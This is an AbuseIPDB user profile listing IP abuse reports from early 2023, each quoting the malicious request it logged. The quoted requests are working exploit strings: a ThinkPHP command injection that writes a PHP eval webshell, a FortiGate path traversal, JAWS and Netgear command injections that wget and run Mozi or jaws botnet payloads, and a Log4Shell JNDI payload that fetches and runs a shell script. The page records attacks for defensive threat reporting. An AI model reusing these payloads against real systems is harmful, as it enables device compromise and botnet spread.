光盾 - AbuseIPDB User Profile

JavaScript is disabled. Some features of this site may not work properly. For a smoother experience, please enable JavaScript in your browser settings.

User 光盾 joined AbuseIPDB in October 2022 and has reported 37 IP addresses.

Standing (weight) is good.

INACTIVE USER

IP	Date	Comment	Categories
🇯🇵 134.122.134.49	24 Mar 2023	/index.php/?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][ ... show more /index.php/?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo%20'<?php%20@eval($_POST[terry]);print(md5(123));?>'>xml2.php show less	Hacking
🇷🇺 185.7.214.218	24 Mar 2023	/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession	Hacking
🇺🇸 209.141.51.132	24 Mar 2023	/shell?cd+/tmp;rm+-rf+*;wget+heylitimysun.top/jaws;sh+/tmp/jaws	Exploited Host
🇨🇳 123.4.66.171	24 Mar 2023	/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/;wget+http://123.4.66.171:50279/Mozi.m ... show more /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/;wget+http://123.4.66.171:50279/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 show less	Exploited Host
🇳🇱 45.12.253.180	24 Mar 2023	shell?cd+/tmp;rm+-rf+*;wget+45.12.253.180/jaws;sh+/tmp/jaws	Exploited Host
🇳🇱 5.255.105.71	24 Mar 2023	Malware at the IP address	Exploited Host
🇨🇳 180.114.40.236	24 Feb 2023	Request URI: /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/;wget+http://180.114.40.2 ... show more Request URI: /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/;wget+http://180.114.40.236:56730/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 show less	Hacking IoT Targeted
🇱🇺 107.189.29.121	24 Feb 2023	Request URI: /translator.php?lang=zh_CN&cmd=upd&edit=$GET%5B'lang'%5D;system('wget%20http://98.159.9 ... show more Request URI: /translator.php?lang=zh_CN&cmd=upd&edit=$GET%5B'lang'%5D;system('wget%20http://98.159.98.243/ohshit.sh;%20curl%20-O%20http://98.159.98.243/ohshit.sh;%20chmod%20777%20ohshit.sh;%20sh%20ohshit.sh'); show less	Hacking Web App Attack
🇨🇳 42.179.254.54	24 Feb 2023	Request URI: /shell?cd+/tmp;rm+-rf+*;wget+update.rawupdater.cf/jaws;sh+/tmp/jaws	Hacking Web App Attack
🇮🇳 210.89.62.212	24 Feb 2023	Request URI: /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/;wget+http://210.89.62.21 ... show more Request URI: /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/;wget+http://210.89.62.212:48921/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 show less	Hacking IoT Targeted
🇳🇱 5.255.109.219	24 Feb 2023	It attempts to probe for and exploits known vulnerabilities. "User-Agent":"t('${${env:BARFOO:-j}nd ... show more It attempts to probe for and exploits known vulnerabilities. "User-Agent":"t('${${env:BARFOO:-j}ndi${env:BARFOO:-:}${env:BARFOO:-l}dap${env:BARFOO:-:}//5.255.109.219:1389/TomcatBypass/Command/Base64/Y2QgL3RtcCB8fCBjZCAvdmFyL3J1biB8fCBjZCAvbW50IHx8IGNkIC9yb290IHx8IGNkIC87IGN1cmwgaHR0cDovLzIzLjE0Ny4yMjcuMjEwL2FrdHVhbGlzaWVyZW4uc2ggLW8gYWt0dWFsaXNpZXJlbi5zaDsgd2dldCBodHRwOi8vMjMuMTQ3LjIyNy4yMTAvYWt0dWFsaXNpZXJlbi5zaDsgY2htb2QgNzc3IGFrdHVhbGlzaWVyZW4uc2g7IHNoIGFrdHVhbGlzaWVyZW4uc2g7IHJtIC1yZiBha3R1YWxpc2llcmVuLnNoOyBybSAtcmYgYWt0dWFsaXNpZXJlbi5zaC4x}')" show less	Hacking Exploited Host Web App Attack